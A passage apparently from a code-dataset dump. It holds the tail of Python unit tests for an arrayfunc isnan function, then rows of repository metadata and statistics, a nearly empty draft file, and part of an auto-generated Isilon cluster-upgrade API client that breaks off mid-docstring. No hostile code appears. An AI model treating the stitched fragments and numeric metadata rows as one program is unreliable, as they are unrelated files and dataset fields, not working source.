self.testdataend = array.array('f', xdata + xdata + datanan)
########################################################
def test_isnan_a1(self):
"""Test isnan no value to find - Array code f.
"""
result = arrayfunc.isnan(self.cleandata)
expected = any([math.isnan(x) for x in self.cleandata])
# Should not find the value.
self.assertEqual(result, expected)
########################################################
def test_isnan_a2(self):
"""Test isnan value to find in centre - Array code f.
"""
result = arrayfunc.isnan(self.testdatacentre)
expected = any([math.isnan(x) for x in self.testdatacentre])
# Should find the value.
self.assertEqual(result, expected)
########################################################
def test_isnan_a3(self):
"""Test isnan value to find at start - Array code f.
"""
result = arrayfunc.isnan(self.testdatastart)
expected = any([math.isnan(x) for x in self.testdatastart])
# Should find the value.
self.assertEqual(result, expected)
########################################################
def test_isnan_a4(self):
"""Test isnan value to find at end - Array code f.
"""
result = arrayfunc.isnan(self.testdataend)
expected = any([math.isnan(x) for x in self.testdataend])
# Should find the value.
self.assertEqual(result, expected)
########################################################
def test_isnan_b1(self):
"""Test isnan value to find beyond maxlen parameter - Array code f.
"""
result = arrayfunc.isnan(self.testdataend, maxlen=len(self.testdataend) - 1)
expected = any([math.isnan(x) for x in self.testdataend[:len(self.testdataend) - 1]])
# Should find the value.
self.assertEqual(result, expected)
##############################################################################
##############################################################################
class isnan_general_nan_d(unittest.TestCase):
"""Test for basic general function operation.
test_template_nonfinite
"""
########################################################
def setUp(self):
"""Initialise.
"""
xdata = [-5.0,-1.0,0.0,0.4,0.8,1.2,1.6,2.0,2.4,2.8,3.2,3.6]
datanan = [math.nan]
datainf = [math.inf]
dataninf = [-math.inf]
self.data = array.array('d', xdata + datanan + xdata)
self.expected = any([math.isnan(x) for x in self.data])
self.limited = len(self.data) // 2
limresults = [math.isnan(x) for x in self.data]
self.expectedlim = any(limresults[:self.limited])
########################################################
def test_isnan_a1(self):
"""Test isnan basic - Array code d.
"""
result = arrayfunc.isnan(self.data)
self.assertEqual(result, self.expected)
########################################################
def test_isnan_a2(self):
"""Test isnan basic for return type - Array code d.
"""
result = arrayfunc.isnan(self.data)
self.assertIsInstance(result, bool)
########################################################
def test_isnan_b1(self):
"""Test isnan with array maxlen - Array code d.
"""
result = arrayfunc.isnan(self.data, maxlen=self.limited)
self.assertEqual(result, self.expectedlim)
##############################################################################
##############################################################################
class isnan_param_errors_nan_d(unittest.TestCase):
"""Test for invalid parameters.
param_invalid_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
xdata = [-5.0,-1.0,0.0,0.4,0.8,1.2,1.6,2.0,2.4,2.8,3.2,3.6]
datanan = [math.nan] * len(xdata)
datainf = [math.inf] * len(xdata)
dataninf = [-math.inf] * len(xdata)
self.floatarray = array.array('d', xdata + datanan)
self.floatarray2 = copy.copy(self.floatarray)
self.testmaxlen = len(self.floatarray) // 2
# Create some integer array equivalents.
self.intarray = array.array('i', [int(x) for x in xdata + xdata])
########################################################
def test_isnan_a1(self):
"""Test isnan for integer array - Array code d.
"""
# This version is expected to pass.
result = arrayfunc.isnan(self.floatarray)
# This is the actual test.
with self.assertRaises(TypeError):
result = arrayfunc.isnan(self.intarray)
########################################################
def test_isnan_b1(self):
"""Test isnan for maxlen='a' - Array code d.
"""
# This version is expected to pass.
result = arrayfunc.isnan(self.floatarray, maxlen=self.testmaxlen)
# This is the actual test.
with self.assertRaises(TypeError):
result = arrayfunc.isnan(self.floatarray2, maxlen='a')
########################################################
def test_isnan_c1(self):
"""Test isnan for matherrors=True (unsupported option) - Array code d.
"""
# This version is expected to pass.
result = arrayfunc.isnan(self.floatarray)
# This is the actual test.
with self.assertRaises(TypeError):
result = arrayfunc.isnan(self.floatarray2, matherrors=True)
########################################################
def test_isnan_d1(self):
"""Test isnan for missing array - Array code d.
"""
with self.assertRaises(TypeError):
result = arrayfunc.isnan()
########################################################
def test_isnan_d2(self):
"""Test isnan for missing array with maxlen - Array code d.
"""
with self.assertRaises(TypeError):
result = arrayfunc.isnan(maxlen=self.testmaxlen)
########################################################
def test_isnan_no_params_d3(self):
"""Test isnan with no parameters - Array code d.
"""
with self.assertRaises(TypeError):
result = arrayfunc.isnan()
##############################################################################
##############################################################################
class isnan_nan_d(unittest.TestCase):
"""Test for correct results for each of the non-finite data conditions.
nan_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
xdata = [-5.0,-1.0,0.0,0.4,0.8,1.2,1.6,2.0,2.4,2.8,3.2,3.6]
datanan = [math.nan]
datainf = [math.inf]
dataninf = [-math.inf]
self.cleandata = array.array('d', xdata + xdata)
self.testdatacentre = array.array('d', xdata + datanan + xdata)
self.testdatastart = array.array('d', datanan + xdata + xdata)
self.testdataend = array.array('d', xdata + xdata + datanan)
########################################################
def test_isnan_a1(self):
"""Test isnan no value to find - Array code d.
"""
result = arrayfunc.isnan(self.cleandata)
expected = any([math.isnan(x) for x in self.cleandata])
# Should not find the value.
self.assertEqual(result, expected)
########################################################
def test_isnan_a2(self):
"""Test isnan value to find in centre - Array code d.
"""
result = arrayfunc.isnan(self.testdatacentre)
expected = any([math.isnan(x) for x in self.testdatacentre])
# Should find the value.
self.assertEqual(result, expected)
########################################################
def test_isnan_a3(self):
"""Test isnan value to find at start - Array code d.
"""
result = arrayfunc.isnan(self.testdatastart)
expected = any([math.isnan(x) for x in self.testdatastart])
# Should find the value.
self.assertEqual(result, expected)
########################################################
def test_isnan_a4(self):
"""Test isnan value to find at end - Array code d.
"""
result = arrayfunc.isnan(self.testdataend)
expected = any([math.isnan(x) for x in self.testdataend])
# Should find the value.
self.assertEqual(result, expected)
########################################################
def test_isnan_b1(self):
"""Test isnan value to find beyond maxlen parameter - Array code d.
"""
result = arrayfunc.isnan(self.testdataend, maxlen=len(self.testdataend) - 1)
expected = any([math.isnan(x) for x in self.testdataend[:len(self.testdataend) - 1]])
# Should find the value.
self.assertEqual(result, expected)
##############################################################################
##############################################################################
if __name__ == '__main__':
# Check to see if the log file option has been selected. This is an option
# which we have added in order to decide where to output the results.
if '-l' in sys.argv:
# Remove the option from the argument list so that "unittest" does
# not complain about unknown options.
sys.argv.remove('-l')
with open('af_unittest.txt', 'a') as f:
f.write('\n\n')
f.write('isnan\n\n')
trun = unittest.TextTestRunner(f)
unittest.main(testRunner=trun)
else:
unittest.main()
##############################################################################
| 27.968577 | 87 | 0.52713 | 1,712 | 15,131 | 4.601636 | 0.13493 | 0.065118 | 0.086316 | 0.085301 | 0.856055 | 0.855293 | 0.846662 | 0.821021 | 0.820259 | 0.819751 | 0 | 0.016538 | 0.140837 | 15,131 | 540 | 88 | 28.02037 | 0.589462 | 0.277179 | 0 | 0.79558 | 0 | 0 | 0.00743 | 0 | 0 | 0 | 0 | 0 | 0.154696 | 1 | 0.187845 | false | 0 | 0.049724 | 0 | 0.270718 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
097779f7da081af5d64376f06c1f61f88df605d9 | 12 | py | Python | _draft/answers/x_7_7.py | ofl/kuku2 | 7247fb1862d917d23258ebe7a93dca5939433225 | [
"MIT"
] | null | null | null | _draft/answers/x_7_7.py | ofl/kuku2 | 7247fb1862d917d23258ebe7a93dca5939433225 | [
"MIT"
] | 1 | 2021-11-13T08:03:04.000Z | 2021-11-13T08:03:04.000Z | _draft/answers/x_7_7.py | ofl/kuku2 | 7247fb1862d917d23258ebe7a93dca5939433225 | [
"MIT"
] | null | null | null | # x_7_7
#
#
| 3 | 7 | 0.416667 | 3 | 12 | 1 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 0.333333 | 12 | 3 | 8 | 4 | 0.125 | 0.416667 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
61f2c67337c93c8073137d10bc1aeac8057ab27a | 49,444 | py | Python | isi_sdk/apis/upgrade_api.py | Atomicology/isilon_sdk_python | 91039da803ae37ed4abf8d2a3f59c333f3ef1866 | [
"MIT"
] | null | null | null | isi_sdk/apis/upgrade_api.py | Atomicology/isilon_sdk_python | 91039da803ae37ed4abf8d2a3f59c333f3ef1866 | [
"MIT"
] | null | null | null | isi_sdk/apis/upgrade_api.py | Atomicology/isilon_sdk_python | 91039da803ae37ed4abf8d2a3f59c333f3ef1866 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
UpgradeApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class UpgradeApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_cluster_add_remaining_node(self, cluster_add_remaining_node, **kwargs):
"""
Let system absorb any remaining or new nodes inside the existing upgrade.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_cluster_add_remaining_node(cluster_add_remaining_node, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Empty cluster_add_remaining_node: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_add_remaining_node']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_add_remaining_node" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_add_remaining_node' is set
if ('cluster_add_remaining_node' not in params) or (params['cluster_add_remaining_node'] is None):
raise ValueError("Missing the required parameter `cluster_add_remaining_node` when calling `create_cluster_add_remaining_node`")
resource_path = '/platform/3/upgrade/cluster/add_remaining_nodes'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_add_remaining_node' in params:
body_params = params['cluster_add_remaining_node']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def create_cluster_archive_item(self, cluster_archive_item, **kwargs):
"""
Start an archive of an upgrade.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_cluster_archive_item(cluster_archive_item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ClusterArchiveItem cluster_archive_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_archive_item']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_archive_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_archive_item' is set
if ('cluster_archive_item' not in params) or (params['cluster_archive_item'] is None):
raise ValueError("Missing the required parameter `cluster_archive_item` when calling `create_cluster_archive_item`")
resource_path = '/platform/3/upgrade/cluster/archive'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_archive_item' in params:
body_params = params['cluster_archive_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def create_cluster_assess_item(self, cluster_assess_item, **kwargs):
"""
Start upgrade assessment on cluster.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_cluster_assess_item(cluster_assess_item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ClusterAssessItem cluster_assess_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_assess_item']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_assess_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_assess_item' is set
if ('cluster_assess_item' not in params) or (params['cluster_assess_item'] is None):
raise ValueError("Missing the required parameter `cluster_assess_item` when calling `create_cluster_assess_item`")
resource_path = '/platform/3/upgrade/cluster/assess'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_assess_item' in params:
body_params = params['cluster_assess_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def create_cluster_commit_item(self, cluster_commit_item, **kwargs):
"""
Commit the upgrade of a cluster.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_cluster_commit_item(cluster_commit_item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Empty cluster_commit_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_commit_item']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_commit_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_commit_item' is set
if ('cluster_commit_item' not in params) or (params['cluster_commit_item'] is None):
raise ValueError("Missing the required parameter `cluster_commit_item` when calling `create_cluster_commit_item`")
resource_path = '/platform/3/upgrade/cluster/commit'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_commit_item' in params:
body_params = params['cluster_commit_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def create_cluster_firmware_assess_item(self, cluster_firmware_assess_item, **kwargs):
"""
Start firmware upgrade assessment on cluster.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_cluster_firmware_assess_item(cluster_firmware_assess_item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Empty cluster_firmware_assess_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_firmware_assess_item']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_firmware_assess_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_firmware_assess_item' is set
if ('cluster_firmware_assess_item' not in params) or (params['cluster_firmware_assess_item'] is None):
raise ValueError("Missing the required parameter `cluster_firmware_assess_item` when calling `create_cluster_firmware_assess_item`")
resource_path = '/platform/3/upgrade/cluster/firmware/assess'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_firmware_assess_item' in params:
body_params = params['cluster_firmware_assess_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def create_cluster_firmware_upgrade_item(self, cluster_firmware_upgrade_item, **kwargs):
"""
The settings necessary to start a firmware upgrade.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_cluster_firmware_upgrade_item(cluster_firmware_upgrade_item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ClusterFirmwareUpgradeItem cluster_firmware_upgrade_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_firmware_upgrade_item']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_firmware_upgrade_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_firmware_upgrade_item' is set
if ('cluster_firmware_upgrade_item' not in params) or (params['cluster_firmware_upgrade_item'] is None):
raise ValueError("Missing the required parameter `cluster_firmware_upgrade_item` when calling `create_cluster_firmware_upgrade_item`")
resource_path = '/platform/3/upgrade/cluster/firmware/upgrade'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_firmware_upgrade_item' in params:
body_params = params['cluster_firmware_upgrade_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def create_cluster_patch_abort_item(self, cluster_patch_abort_item, **kwargs):
"""
Abort the previous action performed by the patch system.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_cluster_patch_abort_item(cluster_patch_abort_item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Empty cluster_patch_abort_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_patch_abort_item']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_patch_abort_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_patch_abort_item' is set
if ('cluster_patch_abort_item' not in params) or (params['cluster_patch_abort_item'] is None):
raise ValueError("Missing the required parameter `cluster_patch_abort_item` when calling `create_cluster_patch_abort_item`")
resource_path = '/platform/3/upgrade/cluster/patch/abort'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_patch_abort_item' in params:
body_params = params['cluster_patch_abort_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def create_cluster_retry_last_action_item(self, cluster_retry_last_action_item, **kwargs):
"""
Retry the last upgrade action, in-case the previous attempt failed.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_cluster_retry_last_action_item(cluster_retry_last_action_item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ClusterRetryLastActionItem cluster_retry_last_action_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_retry_last_action_item']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_retry_last_action_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_retry_last_action_item' is set
if ('cluster_retry_last_action_item' not in params) or (params['cluster_retry_last_action_item'] is None):
raise ValueError("Missing the required parameter `cluster_retry_last_action_item` when calling `create_cluster_retry_last_action_item`")
resource_path = '/platform/3/upgrade/cluster/retry_last_action'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_retry_last_action_item' in params:
body_params = params['cluster_retry_last_action_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def create_cluster_rollback_item(self, cluster_rollback_item, **kwargs):
"""
Rollback the upgrade of a cluster.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_cluster_rollback_item(cluster_rollback_item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Empty cluster_rollback_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_rollback_item']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_rollback_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_rollback_item' is set
if ('cluster_rollback_item' not in params) or (params['cluster_rollback_item'] is None):
raise ValueError("Missing the required parameter `cluster_rollback_item` when calling `create_cluster_rollback_item`")
resource_path = '/platform/3/upgrade/cluster/rollback'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_rollback_item' in params:
body_params = params['cluster_rollback_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def create_cluster_upgrade_item(self, cluster_upgrade_item, **kwargs):
"""
The settings necessary to start an upgrade.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_cluster_upgrade_item(cluster_upgrade_item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ClusterUpgradeItem cluster_upgrade_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_upgrade_item']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_upgrade_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_upgrade_item' is set
if ('cluster_upgrade_item' not in params) or (params['cluster_upgrade_item'] is None):
raise ValueError("Missing the required parameter `cluster_upgrade_item` when calling `create_cluster_upgrade_item`")
resource_path = '/platform/3/upgrade/cluster/upgrade'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_upgrade_item' in params:
body_params = params['cluster_upgrade_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_cluster_firmware_progress(self, **kwargs):
"""
Cluster wide firmware upgrade status info.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_cluster_firmware_progress(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: ClusterFirmwareProgress
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_cluster_firmware_progress" % key
)
params[key] = val
del params['kwargs']
resource_path = '/platform/3/upgrade/cluster/firmware/progress'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClusterFirmwareProgress',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_cluster_firmware_status(self, **kwargs):
"""
The firmware status for the cluster.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_cluster_firmware_status(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param bool devices: Show devices. If false, this returns an empty list. Default is false.
:param bool package: Show package. If false, this returns an empty list.Default is false.
:return: ClusterFirmwareStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['devices', 'package']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_cluster_firmware_status" % key
)
params[key] = val
del params['kwargs']
resource_path = '/platform/3/upgrade/cluster/firmware/status'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'devices' in params:
query_params['devices'] = params['devices']
if 'package' in params:
query_params['package'] = params['package']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClusterFirmwareStatus',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_cluster_node(self, cluster_node_id, **kwargs):
"""
The node details useful during an upgrade or assessment.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_cluster_node(cluster_node_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
